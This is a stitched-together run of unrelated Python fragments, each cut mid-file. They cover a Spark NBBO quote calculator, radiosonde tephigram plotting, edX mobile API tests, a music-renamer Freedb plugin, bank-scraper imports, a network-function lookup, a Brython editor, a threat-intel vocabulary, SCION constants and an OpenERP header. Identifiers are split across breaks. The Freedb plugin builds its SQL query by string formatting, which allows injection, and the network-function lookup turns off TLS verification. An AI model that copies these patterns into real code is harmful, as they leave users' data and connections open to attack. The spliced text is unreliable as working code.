[0]*len(exchangeList) baExCnt = [0]*len(exchangeList) bbExSize = [0]*len(exchangeList) baExSize = [0]*len(exchangeList) currtime=0 # Iterate over the list to calculate nbbo for i in range(len(list1)): if (currtime != int(list1[i][1])): # change of millisecond # Find NBBO and exchange count if (max(bidList) > 0) or (min(askList) < sys.maxsize): # Output key Value pairs where # Key : (<Stock Ticker>, <Time in ms seconds>) # Value : (<best-bid>,<best-bid-exchange>,<best-bid-size>, <best-ask>,<best-ask-exchange>,<best-ask-size> ) maxbid = max(bidList) minask = min(askList) bbEx = bidList.index(maxbid) #index of exchange showing max bid baEx = askList.index(minask) #index of exchange showing min ask bbSize = bidSize[bbEx] #size baSize = askSize[baEx] #size bbExCnt[bbEx] += 1 baExCnt[baEx] += 1 bbExSize[bbEx] += bbSize baExSize[bbEx] += baSize currtime=int(list1[i][1]) # set the latest bid and ask if bid & ask are not zero and if bidsize and asksize are not zero # Backout the bid or ask if either is 0 if ((list1[i][2] != 0) & (list1[i][3] != 0)): bidList[exchangeList.index(list1[i][6])] = list1[i][2] bidSize[exchangeList.index(list1[i][6])] = list1[i][3] elif
((list1[i][2] == 0) or (list1[i][8] == 'B')): bidList[exchangeList.index(list1[i][6])] = 0 bidSize[exchangeList.index(list1[i][6])] = 0 # size if ((list1[i][4]
!= 0) & (list1[i][5] != 0)): askList[exchangeList.index(list1[i][7])] = list1[i][4] askSize[exchangeList.index(list1[i][7])] = list1[i][5] elif ((list1[i][4] == 0) or (list1[i][8] == 'B')): askList[exchangeList.index(list1[i][7])] = sys.maxsize askSize[exchangeList.index(list1[i][7])] = 0 for j in range(len(exchangeList)): if (bbExCnt[j] > 0): bbExSize[j] = bbExSize[j]/bbExCnt[j] if (baExCnt[j] > 0): baExSize[j] = baExSize[j]/baExCnt[j] nbboList.append((record[0],(bbExCnt, bbExSize, baExCnt, baExSize))) return nbboList if __name__ == "__main__": conf = SparkConf().setAppName("nbbo_hfalert") sc = SparkContext(conf=conf) data1 = sc.textFile(inputDir) data2 = data1.zipWithIndex() data3 = data2.map(lambda rec: (rec[0][10:26].strip(), (rec[1], #index rec[0][0:9], #ms time float(rec[0][26:37])/10000, #bid price int(rec[0][37:44]), #bid size float(rec[0][44:55])/10000, #ask price int(rec[0][55:62]), #ask size rec[0][67], #bid exchange rec[0][68], #ask exchange rec[0][87]))).groupByKey() #cancel or correction result = data3.flatMap(lambda records: processquote(records)).map(lambda rec: [rec[0], rec[1][0], rec[1][1], rec[1][2], rec[1][3]]) result.saveAsTextFile(outputDir)
unctions.py') from TephigramPlot import * from SoundingRoutines import * imp.load_source('GeogFuncs', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/GeogFunctions.py') from GeogFuncs import * pmin=200. station_list_cs=[42182, 43003, 43014, 42867, 43371, 43353, 43285, 43192, 43150, 42339, 40990, 40948] #station_list_cs=[43003] date_min=datetime.datetime(1960,5,1,0,0,0) date_max=datetime.datetime(2014,10,1,0,0,0) delta = relativedelta(weeks=+1) variable_list={'pressures': 0, 'temps':1, 'dewpoints':2, 'winddirs':3, 'windspeeds':4, 'pot_temp':5, 'sat_vap_pres':6, 'vap_press':7, 'rel_hum':8, 'wvmr':9, 'sp_hum':10, 'sat_temp':11, 'theta_e':12, 'theta_e_sat':13, 'theta_e_minus_theta_e_sat':14} variable_list_line={'lcl_temp': 0, 'lcl_vpt':1, 'pbl_pressure':2, 'surface_pressure':3, 'T_eq_0':4} def variable_name_index_match(variable, variable_list): for key, value in variable_list.iteritems(): # iter on both keys and values if key.startswith('%s' % variable) and key.endswith('%s' % variable): arr_index_var=value return arr_index_var
# Parse the data for stat in station_list_cs: station_name,la,lo, st_height=StationInfoSearch(stat) load_file = load('/nfs/a90/eepdw/Data/Observations/Radiosonde_Numpy/Radiosonde_Cross_Section_' 'IND_SOUNDING_INTERP_MEAN_Climat_%s_%s_%s_%s.npz'
% (date_min.strftime('%Y%m%d'), date_max.strftime('%Y%m%d'), delta, stat)) data=load_file['date_bin_mean_all_dates_one_station'] dates=load_file['dates_for_plotting'] for bin in range(data.shape[0]): try: p=data[bin,0,:]/100 T=data[bin,1,:]-273.15 Td=T-data[bin,2,:] h=data[bin,15,:] da=dates[bin] #print T #print p #print Td #pdb.set_trace() #u_wind,v_wind = u_v_winds(data[bin,3,:], data[bin,4,:]) u_wind,v_wind = data[bin,-2,:], data[bin,-1,:] # Create a new figure. The dimensions here give a good aspect ratio fig = plt.figure(figsize=(10, 8), frameon=False) #fig.patch.set_visible(False) tephigram_plot_height=0.85 tephigram_plot_bottom=.085 ax = fig.add_axes([.085,tephigram_plot_bottom,.65,tephigram_plot_height], projection='skewx', frameon=False, axisbg='w') ax.set_yscale('log') plt.grid(True) #pdb.set_trace() tmax=math.ceil(nanmax(T)/10)*10 tmin=math.floor(nanmin(Td[p>400])/10)*10 pmax=math.ceil(nanmax(p)/50)*50 P=linspace(pmax,pmin,37) w = array([0.0001,0.0004,0.001, 0.002, 0.004, 0.007, 0.01, 0.016, 0.024, 0.032, 0.064, 0.128]) ax.add_mixratio_isopleths(w,linspace(pmax, 700., 37),color='m',ls='-',alpha=.5,lw=0.5) ax.add_dry_adiabats(linspace(-40,40,9),P,color='k',ls='-',alpha=.5,lw=0.8) ax.add_moist_adiabats(linspace(-40,40,18),P,color='k',ls='--',alpha=.5,lw=0.8, do_labels=False) ax.other_housekeeping(pmax, pmin, 40,-40) wbax = fig.add_axes([0.75,tephigram_plot_bottom,0.12,tephigram_plot_height],frameon=False, sharey=ax, label='barbs') ax_text_box = fig.add_axes([0.85,0.085,.12,tephigram_plot_height], frameon=False, axisbg='w') # Plot the data using normal plotting functions, in this case using semilogy ax.semilogy(T, p, 'r', linewidth=2) ax.semilogy(Td, p, 'r',linewidth=2) # row_labels=( # 'SLAT', # 'SLON', # 'SELV', # 'SHOW', # 'LIFT', # 'LFTV', # 'SWET', # 'KINX', # 'CTOT', # 'VTOT', # 'TOTL', # 'CAPE', # 'CINS', # 'CAPV', # 'CINV', # 'LFCT', # 'LFCV', # 'BRCH', # 'BRCV', # 'LCLT', # 'LCLP', # 'MLTH', # 'MLMR', # 'THCK', # 'PWAT') # variable='pbl_pressure' # var_index = variable_name_index_match(variable, variable_list_line) # print load_file['date_bin_mean_all_dates_one_station_single'].shape # pbl_pressure = load_file['date_bin_mean_all_dates_one_station_single'][bin,0,var_index] # print pbl_pressure # EQLV, pp, lclp,lfcp, lclt, delta_z, CAPE, CIN=CapeCinPBLInput(p, T, Td, h, st_height, pbl_pressure/100) # print lclp # table_vals=( # #'%s' % station_name, # #'Climatology - Week beg. %s' % da, # '%s' % la, # '%s' % lo, # '%s' % st_height, # '%.1f' % ShowalterIndex(T, Td, p), # ['Showalter index', # '%.1f' % LiftedIndex(T, Td, p, h, st_height), # 'Lifted index', # '--', # 'LIFT computed using virtual temperature', # '--', # 'SWEAT index', # '%.1f' % KIndex(T, Td, p), # 'K index', # '%.1f' % CrossTotalsIndex(T, Td, p), # 'Cross totals index', # '%.1f' % VerticalTotalsIndex(T, p), # 'Vertical totals index', # '%.1f' % TotalTotalsIndex(T, Td, p), # 'Total totals index', # '%.1f' % CAPE, # 'CAPE', # '%.1f' % CIN, # 'CIN', # '--', # 'CAPE using virtual temperature', # '--', # 'CINS using virtual temperature', # '%.1f' % lfcp, # 'Level of free convection', # '--', # 'LFCT using virtual temperature', # '--' , # 'Bulk Richardson number', # '--', # 'Bulk richardson using CAPV', # '%.1f' % lclt, # 'Temp [K] of the Lifted Condensation Level', # '%.1f' % lclp , # 'Pres [hPa] of the Lifted Condensation Level', # '--', # 'Mean mixed layer potential temperature', # '--', # 'Mean mixed layer mixing ratio', # '--', # '1000 hPa to 500 hPa thickness', # '--') # 'Precipitable water [mm] for entire sounding'] # Wind barbs barbs_idx=np.logspace(np.log10(10),np.log10(max(len(u_wind))),num=32).astype(int) wbax.set_yscale('log') wbax.xaxis.set_ticks([],[]) wbax.yaxis.grid(True,ls='-',color='y',lw=0.5) wbax.set_xlim(-1.5,1.5) wbax.get_yaxis().set_visible(False) wbax.set_ylim(pmax+100,pmin)
from __future__ import absolute_import from changes.api.base import APIView from changes.models import Task class TaskIndexAPIView(APIView): def get(self): q
ueryset = Task.query.order_by(Task.date_created.desc()) return self.paginat
e(queryset)
#!/usr/bin/env python # vi:ai:et:ts=4 sw=4 # # -*- coding: utf8 -*- # # PyMmr My Music Renamer # Copyright (C) 2007-2010 mathgl67@gmail.com # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # from mmr.plugin import AbstractResearchPlugin from mmr.album import Album from mmr.abstract_investigate import AbstractInvestigate class Freedb(AbstractResearchPlugin): def setup(self): self.investigate_class = FreedbInvestigate self.about = { "name": u"Freedb", "short_description": u"", "long_description": u"", } self.priority = 5 def available(self): try: import MySQLdb except ImportError as exception: return False return True plugin_class=Freedb class FreedbInvestigate(AbstractInvestigate): def _set_up_(self): imp
ort MySQLdb self.db = MySQLdb.connect( host=self._config_['host
'], user=self._config_['user'], passwd=self._config_['password'], db=self._config_['db'] ) self.db.set_character_set("utf8") self._album_ = Album('freedb', self._base_score_) def do_album(self): for res in self._album_list_: if res.artist and res.album: artist = res.artist.encode("UTF-8") album = res.album.encode("UTF-8") self.db.query(""" SELECT genre, year FROM album WHERE artist LIKE "%s" AND title LIKE "%s" """ % ( artist, album )) r = self.db.store_result() for (genre, year) in r.fetch_row(0): self._album_.artist = res.artist self._album_.album = res.album self._album_.genre = unicode(genre, "UTF-8") self._album_.year = unicode(str(year), "UTF-8") return self._album_ def do_track(self, file_obj, result_array): return None
# -*- coding: utf-8 -*- # Copyright(C) 2010-2011 Nicolas Duhamel # # This file is part of a weboob module. # # This weboob module is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This weboob module is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with this weboob module. If not, see <http://www.gnu.org/licenses/>. from .login import ( LoginPage, Initident, CheckPassword, r
epositionnerCheminCourant, BadLoginPage, AccountDesactivate, UnavailablePage, Validated2FAPage, TwoFAPage, SmsPage, DecoupledPage, ) from .accountlist import AccountList, AccountRIB, Advisor, RevolvingAttributesPage from .accounthistory import AccountHistory, CardsList from .transfer import TransferChooseAccounts, CompleteTransfer, TransferConfirm, TransferSummary, CreateRecipient, ValidateRecipient,\
ValidateCountry, ConfirmPage, RcptSummary from .subscription import SubscriptionPage, DownloadPage, ProSubscriptionPage __all__ = ['LoginPage', 'Initident', 'CheckPassword', 'repositionnerCheminCourant', "AccountList", 'AccountHistory', 'BadLoginPage', 'AccountDesactivate', 'TransferChooseAccounts', 'CompleteTransfer', 'TransferConfirm', 'TransferSummary', 'UnavailablePage', 'CardsList', 'AccountRIB', 'Advisor', 'CreateRecipient', 'ValidateRecipient', 'ValidateCountry', 'ConfirmPage', 'RcptSummary', 'SubscriptionPage', 'DownloadPage', 'ProSubscriptionPage', 'RevolvingAttributesPage', 'Validated2FAPage', 'TwoFAPage', 'SmsPage', 'DecoupledPage', ]
rses), 1) found_course = courses[0]['course'] self.assertIn('courses/{}/about'.format(self.course.id), found_course['course_about']) self.assertIn('course_info/{}/updates'.format(self.course.id), found_course['course_updates']) self.assertIn('course_info/{}/handouts'.format(self.course.id), found_course['course_handouts']) self.assertIn('video_outlines/courses/{}'.format(self.course.id), found_course['video_outline']) self.assertEqual(found_course['id'], unicode(self.course.id)) self.assertEqual(courses[0]['mode'], CourseMode.DEFAULT_MODE_SLUG) self.assertEqual(courses[0]['course']['subscription_id'], self.course.clean_id(padding_char='_')) expected_course_image_url = course_image_url(
self.course) self.assertIsNotNone(expected_course_image_url) self.assertIn(expected_course_image_url, found_course['course_image']) self.assertIn(expected_course_ima
ge_url, found_course['media']['course_image']['uri']) def verify_failure(self, response, error_type=None): self.assertEqual(response.status_code, 200) courses = response.data self.assertEqual(len(courses), 0) @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_sort_order(self): self.login() num_courses = 3 courses = [] for course_index in range(num_courses): courses.append(CourseFactory.create(mobile_available=True)) self.enroll(courses[course_index].id) # verify courses are returned in the order of enrollment, with most recently enrolled first. response = self.api_response() for course_index in range(num_courses): self.assertEqual( response.data[course_index]['course']['id'], unicode(courses[num_courses - course_index - 1].id) ) @patch.dict(settings.FEATURES, { 'ENABLE_PREREQUISITE_COURSES': True, 'DISABLE_START_DATES': False, 'ENABLE_MKTG_SITE': True, }) def test_courseware_access(self): self.login() course_with_prereq = CourseFactory.create(start=self.LAST_WEEK, mobile_available=True) prerequisite_course = CourseFactory.create() set_prerequisite_courses(course_with_prereq.id, [unicode(prerequisite_course.id)]) # Create list of courses with various expected courseware_access responses and corresponding expected codes courses = [ course_with_prereq, CourseFactory.create(start=self.NEXT_WEEK, mobile_available=True), CourseFactory.create(visible_to_staff_only=True, mobile_available=True), CourseFactory.create(start=self.LAST_WEEK, mobile_available=True, visible_to_staff_only=False), ] expected_error_codes = [ MilestoneAccessError().error_code, # 'unfulfilled_milestones' StartDateError(self.NEXT_WEEK).error_code, # 'course_not_started' VisibilityError().error_code, # 'not_visible_to_user' None, ] # Enroll in all the courses for course in courses: self.enroll(course.id) # Verify courses have the correct response through error code. Last enrolled course is first course in response response = self.api_response() for course_index in range(len(courses)): result = response.data[course_index]['course']['courseware_access'] self.assertEqual(result['error_code'], expected_error_codes[::-1][course_index]) if result['error_code'] is not None: self.assertFalse(result['has_access']) @ddt.data( ('next_week', ADVERTISED_START, ADVERTISED_START, "string"), ('next_week', None, defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"), ('next_week', '', defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"), ('default_start_date', ADVERTISED_START, ADVERTISED_START, "string"), ('default_start_date', '', None, "empty"), ('default_start_date', None, None, "empty"), ) @ddt.unpack @patch.dict(settings.FEATURES, {'DISABLE_START_DATES': False, 'ENABLE_MKTG_SITE': True}) def test_start_type_and_display(self, start, advertised_start, expected_display, expected_type): """ Tests that the correct start_type and start_display are returned in the case the course has not started """ self.login() course = CourseFactory.create(start=self.DATES[start], advertised_start=advertised_start, mobile_available=True) self.enroll(course.id) response = self.api_response() self.assertEqual(response.data[0]['course']['start_type'], expected_type) self.assertEqual(response.data[0]['course']['start_display'], expected_display) @patch.dict(settings.FEATURES, {"ENABLE_DISCUSSION_SERVICE": True, 'ENABLE_MKTG_SITE': True}) def test_discussion_url(self): self.login_and_enroll() response = self.api_response() response_discussion_url = response.data[0]['course']['discussion_url'] self.assertIn('/api/discussion/v1/courses/{}'.format(self.course.id), response_discussion_url) def test_org_query(self): self.login() # Create list of courses with various organizations courses = [ CourseFactory.create(org='edX', mobile_available=True), CourseFactory.create(org='edX', mobile_available=True), CourseFactory.create(org='edX', mobile_available=True, visible_to_staff_only=True), CourseFactory.create(org='Proversity.org', mobile_available=True), CourseFactory.create(org='MITx', mobile_available=True), CourseFactory.create(org='HarvardX', mobile_available=True), ] # Enroll in all the courses for course in courses: self.enroll(course.id) response = self.api_response(data={'org': 'edX'}) # Test for 3 expected courses self.assertEqual(len(response.data), 3) # Verify only edX courses are returned for entry in response.data: self.assertEqual(entry['course']['org'], 'edX') @attr(shard=9) @override_settings(MKTG_URLS={'ROOT': 'dummy-root'}) class TestUserEnrollmentCertificates(UrlResetMixin, MobileAPITestCase, MilestonesTestCaseMixin): """ Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/ """ REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']} ENABLED_SIGNALS = ['course_published'] def verify_pdf_certificate(self): """ Verifies the correct URL is returned in the response for PDF certificates. """ self.login_and_enroll() certificate_url = "http://test_certificate_url" GeneratedCertificateFactory.create( user=self.user, course_id=self.course.id, status=CertificateStatuses.downloadable, mode='verified', download_url=certificate_url, ) response = self.api_response() certificate_data = response.data[0]['certificate'] self.assertEquals(certificate_data['url'], certificate_url) @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_no_certificate(self): self.login_and_enroll() response = self.api_response() certificate_data = response.data[0]['certificate'] self.assertDictEqual(certificate_data, {}) @patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': False, 'ENABLE_MKTG_SITE': True}) def test_pdf_certificate_with_html_cert_disabled(self): """ Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True. """ self.verify_pdf_certificate() @patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': True, 'ENABLE_MKTG_SITE': True}) def test_pdf_certificate_with_html_cert_enabled(self): """ Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True. """ self.verify_pdf_certificate() @patch.dict(settings.FEATURES, {'CERTIFICATES_HTM
# Copyright 2018 Politecnico di Torino # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import requests from cybertop.log import LOG def retrieve_vnsfr_id(vnsfo_base_url, vnfd_id, attack_name, timeout): LOG.info("Request vNSFO API call for vnsfd_id=" + vnfd_id + " and attack type=" + attack_name) url = vnsfo_base_url +
"/vnsf/r4/running" LOG.info("VNSFO API call: " + url) try: response = requests.get(url, verify=False, timeout=timeout) LOG.info("VNSFO API response: " + response.text) vnsfs = response.json()["vnsf"] # search for first running instance which matches the query
for vnsf in vnsfs: target_vnf = vnsf['vnfd_id'][:-5].lower() if vnfd_id[:-5].lower() in target_vnf and attack_name.lower() in target_vnf: LOG.info("Found instance=" + vnsf['vnfr_id'] + " for attack=" + attack_name) return vnsf['vnfr_id'] LOG.info("No running instance found from VNSFO API.") return None except Exception as e: LOG.critical("VNSFO API error: " + str(e)) return None
import pandas as pd
from sklearn import linear_model import matplotlib.pyplot as plt df = pd.read_fwf('brain_body.txt') x_values = df[['Brain']] y_values = df[['Body']] #train model on data body_reg = linear_model.LinearRegression() body_reg.fit(x_values, y_values) # visualise results plt.scatter(x_values, y_values) plt.plot(x_values, body_re
g.predict(x_values)) plt.show()
import sys import time import traceback import javascript from browser import document as doc, window, alert has_ace = True try: editor = window.ace.edit("editor") session = editor.getSession() session.setMode("ace/mode/python") editor.setOptions({ 'enableLiveAutocompletion': True, 'enableSnippets': True, 'highlightActiveLine': False, 'highlightSelectedWord': True, 'autoScrollEditorIntoView': True, # 'maxLines': session.getLength() 可以根據程式長度設定 editor 列數 'maxLines': 20 }) except: from browser import html editor = html.TEXTAREA(rows=20, cols=70) doc["editor"] <= editor def get_value(): return editor.value def set_value(x):editor.value = x editor.getValue = get_value editor.setValue = set_value has_ace = False if hasattr(window, 'localStorage'): from browser.local_storage import storage else: storage = None def reset_src(): if storage is not None and "py_src" in storage: editor.setValue(storage["py_src"]) else: editor.setValue('for i in range(10):\n\tprint(i)') editor.scrollToRow(0) editor.gotoLine(0) def reset_src_area(): if storage and "py_src" in storage: editor.value = storage["py_src"] else: editor.value = 'for i in range(10):\n\tprint(i)' class cOutput: def __init__(self,target): self.target = doc[target] def write(self,data): self.target.value += str(data) #if "console" in doc: sys.stdout = cOutput("console") sys.stderr = cOutput("console") def to_str(xx): return str(xx) info = sys.implementation.version doc['version'].text = 'Brython %s.%s.%s' % (info.major, info.minor, info.micro) output = '' def show_console(ev): doc["console"].value = output doc["console"].cols = 60 doc["console"].rows = 10 # load a Python script def load_script(evt): _name = evt.target.value + '?foo=%s' % time.time() editor.setValue(o
pen(_name).read()) # run a script, in global namespace if in_globals is True def run(*args): global output doc["console"].value = '' src = editor.getValue() if storage is not None: storage["py_src"] = src t0 = time.perf_counter() try: #ns = {'__name__':'__main__'} ns = {'__name__':'editor'} exec(src, ns) state = 1 except Exception as exc: traceback.print_exc(file=sys.stderr) st
ate = 0 output = doc["console"].value print('<completed in %6.2f ms>' % ((time.perf_counter() - t0) * 1000.0)) return state if has_ace: reset_src() else: reset_src_area() def clear_console(ev): doc["console"].value = "" doc['run'].bind('click',run) doc['show_console'].bind('click',show_console) doc['clear_console'].bind('click',clear_console)
from crits.vocabulary.vocab import vocab class RelationshipTypes(vocab): """ Vocabulary for Relationship Types. """ COMPRESSED_FROM = "Compressed From" COMPRESSED_INTO = "Compressed Into" CONNECTED_FROM = "Connected From" CONNECTED_TO = "Connected To" CONTAINS = "Contains" CONTAINED_WITHIN = "Contained Within" CREATED = "Created" CREATED_BY = "Created By" DECODED = "Decoded" DECODED_BY = "Decoded By" DECRYPTED = "Decrypted" DECRYPTED_BY = "Decrypted By" DOWNLOADED = "Downloaded" DOWNLOADED_BY = "Downloaded By" DOWNLOADED_FROM = "Downloaded From" DOWNLOADED_TO = "Downloaded To" DROPPED = "Dropped" DROPPED_BY = "Dropped By" INSTALLED = "Installed" INSTALLED_BY = "Installed By" LOADED_FROM = "Loaded From" LOADED_INTO = "Loaded Into" PACKED_FROM = "Packed From" PACKED_INTO = "Packed Into" RECEIVED_FROM = "Received From" SENT_TO = "Sent To" REGISTERED = "Registered" REGISTERED_TO = "Registered To" RELATED_TO = "Related To" RESOLVED_TO = "Resolved To" SENT = "Sent" SENT_BY = "Sent By" SUB_DOMAIN_OF = "Sub-domain Of" SUPRA_DOMAIN_OF = "Supra-domain Of" @classmethod def inverse(cls, relationship=None): """ Return the inverse relationship of the provided relationship. :param relationship: The relationship to get the inverse of. :type relationship: str :returns: str or None """ if relationship is None: return None if relationship == cls.COMPRESSED_FROM: return cls.COMPRESSED_INTO elif relationship == cls.COMPRESSED_INTO: return cls.COMPRESSED_FROM elif relationship == cls.CONNECTED_FROM: return cls.CONNECTED_TO elif relationship == cls.CONNECTED_TO: return cls.CONNECTED_FROM elif relationship == cls.CONTAINS: return cls.CONTAINED_WITHIN elif relationship == cls.CONTAINED_WITHIN: return cls.CONTAINS elif relationship == cls.CREATED: return cls.CREATED_BY elif relationship == cls.CREATED_BY: return cls.CREATED elif relationship == cls.DECODED: return cls.DECODED_BY elif relationship == cls.DECODED_BY: return cls.DECODED elif relationship == cls.DECRYPTED:
return cls.DECRYPTED_BY elif relationship == cls.DECRYPTED_BY: return cls.DECRYPTED elif relationship == cls.DOWNLOADED: return cls.DOWNLOADED_BY elif relationship == cls.DOWNLOADED_BY: return cls.DOWNLOADED elif relationship == cls.DOWNLOADED_FROM: return cls.DOWNLOADED_TO elif relationship == cls.DOWNLOADED_TO:
return cls.DOWNLOADED_FROM elif relationship == cls.DROPPED: return cls.DROPPED_BY elif relationship == cls.DROPPED_BY: return cls.DROPPED elif relationship == cls.INSTALLED: return cls.INSTALLED_BY elif relationship == cls.INSTALLED_BY: return cls.INSTALLED elif relationship == cls.LOADED_FROM: return cls.LOADED_INTO elif relationship == cls.LOADED_INTO: return cls.LOADED_FROM elif relationship == cls.PACKED_FROM: return cls.PACKED_INTO elif relationship == cls.PACKED_INTO: return cls.PACKED_FROM elif relationship == cls.RECEIVED_FROM: return cls.SENT_TO elif relationship == cls.SENT_TO: return cls.RECEIVED_FROM elif relationship == cls.REGISTERED: return cls.REGISTERED_TO elif relationship == cls.REGISTERED_TO: return cls.REGISTERED elif relationship == cls.RELATED_TO: return cls.RELATED_TO elif relationship == cls.RESOLVED_TO: return cls.RESOLVED_TO elif relationship == cls.SENT: return cls.SENT_BY elif relationship == cls.SENT_BY: return cls.SENT elif relationship == cls.SUB_DOMAIN_OF: return cls.SUPRA_DOMAIN_OF elif relationship == cls.SUPRA_DOMAIN_OF: return cls.SUB_DOMAIN_OF else: return None
from .Base_Action import * class ProfileAction(Base_Action): def __init__(self, action_xml, root_action=None): super(self.__class__, self)
.__init__(action_xml, root_action) self.shouldUseL
aunchSchemeArgsEnv = self.contents.get('shouldUseLaunchSchemeArgsEnv'); self.savedToolIdentifier = self.contents.get('savedToolIdentifier'); self.useCustomWorkingDirectory = self.contents.get('useCustomWorkingDirectory'); self.buildConfiguration = self.contents.get('buildConfiguration'); self.debugDocumentVersioning = self.contents.get('debugDocumentVersioning');
# Copyright 2015 ETH Zurich # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ :mod:`defines` --- Constants ============================ Contains constant definitions used throughout the codebase. """ # Stdlib import os #: SCION protocol version SCION_PROTO_VERSION = 0 #: Max TTL of a PathSegment in realtime seconds. # TODO(shitz): This value should be externally configurable. The problem is that # the revocation hash tree TTL needs to be at least as large as MAX_SEGMENT_TTL, # but having a TTL of 1 day makes the hash tree generation costly enough that it # times out on CircleCI. Thus, we should have one external config file for the # Docker/CircleCI environment and one for production. MAX_SEGMENT_TTL = 30 * 60 #: Time unit for HOF expiration. EXP_TIME_UNIT = MAX_SEGMENT_TTL // 256 #: Max number of supported HopByHop extensions (does not include SCMP) MAX_HOPBYHOP_EXT = 3 #: Number of bytes per 'line'. Used for padding in many places. LINE_LEN = 8 #: Generated files directory GEN_PATH = 'gen' #: Topology configuration TOPO_FILE = "topology.yml" #: AS configuration AS_CONF_FILE = "as.yml" #: Path policy config PATH_POLICY_FILE = "path_policy.yml" #: Networks config NETWORKS_FILE = "networks.conf" #: IFIDs list IFIDS_FILE = "ifids.yml" #: AS list AS_LIST_FILE = "as_list.yml" #: Buffer size for receiving packets SCION_BUFLEN = 65535 #: Default SCION endhost data port SCION_UDP_EH_DATA_PORT = 30041 #: Default SCION filter command port SCION_FILTER_CMD_PORT = 30042 #: Default DNS UDP/TCP port SCION_DNS_PORT = 30053 #: Default SCION router UDP port. SCION_ROUTER_PORT = 50000 #: Default SCION dispatcher host addr SCION_DISPATCHER_ADDR = "/run/shm/dispatcher.sock" #: Default SCION dispatcher port SCION_DISPATCHER_PORT = 3334 #: Default SCION dispatcher UNIX socket directory DISPATCHER_DIR = "/run/shm/dispatcher" #: Default SCION dispatcher ID DEFAULT_DISPATCHER_ID = "default" BEACON_SERVICE = "bs" CERTIFICATE_SERVICE = "cs" DNS_SERVICE = "ds" PATH_SERVICE = "ps" ROUTER_SERVICE = "br" SIBRA_SERVICE = "sb" #: All the service types SERVICE_TYPES = ( BEACON_SERVICE, CERTIFICATE_SERVICE, DNS_SERVICE, PATH_SERVICE, ROUTER_SERVICE, SIBRA_SERVICE, ) #: Dispatcher registration timeout DISPATCHER_TIMEOUT = 60 #: How often IFID packet is sent to neighboring router. IFID_PKT_TOUT = 1 #: Default MTU - assumes overlay is ipv4+udp DEFAULT_MTU = 1500 - 20 - 8 #: IPv6 min value SCION_MIN_MTU = 1280 #: Length of opaque fields OPAQUE_FIELD_LEN = 8 #: How long certain warnings should be suppresed after startup STARTUP_QUIET_PERIOD = 30 #: N
umber of seconds per sibra tick SIBRA_TICK = 4 #: How far in the future a steady path can reserve at a time. SIBRA_MAX_STEADY_TICKS = 45 #: How far in the future an ephemeral path c
an reserve at a time. SIBRA_MAX_EPHEMERAL_TICKS = 4 #: Length of steady path ID in bytes SIBRA_STEADY_ID_LEN = 8 #: Length of ephemeral path ID in bytes SIBRA_EPHEMERAL_ID_LEN = 16 #: SIBRA Bandwidth multiplier SIBRA_BW_FACTOR = 16 * 1024 #: SIBRA max reservation index SIBRA_MAX_IDX = 16 PATH_FLAG_SIBRA = "SIBRA" MAX_HOST_ADDR_LEN = 16 # Time per Epoch HASHTREE_EPOCH_TIME = 10 # The tolerable error in epoch in seconds. HASHTREE_EPOCH_TOLERANCE = 5 # Max time to live HASHTREE_TTL = MAX_SEGMENT_TTL # Number of epochs in one TTL per interface HASHTREE_N_EPOCHS = HASHTREE_TTL // HASHTREE_EPOCH_TIME # How much time in advance to compute the next hash tree HASHTREE_UPDATE_WINDOW = HASHTREE_TTL // 3 # TCP polling timeouts, used by accept() and recv(). TCP_ACCEPT_POLLING_TOUT = 1 # SCION control-plane TCP connection timeout. TCP_TIMEOUT = 5
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import sys import openerp.netsvc as netsvc import openerp.osv as base import openerp.pooler as pooler from openerp.tools.safe_eval import safe_eval as eval class Env(dict): def __init__(self, cr, uid, model, ids): self.cr = cr self.uid = uid self.model = model self.ids = ids self.obj = pooler.get_pool(cr.dbname).get(model) self.columns = self.obj._columns.keys() + self.obj._inherit_fields.keys() def __getitem__(self, key): if (key in self.columns) or (key in 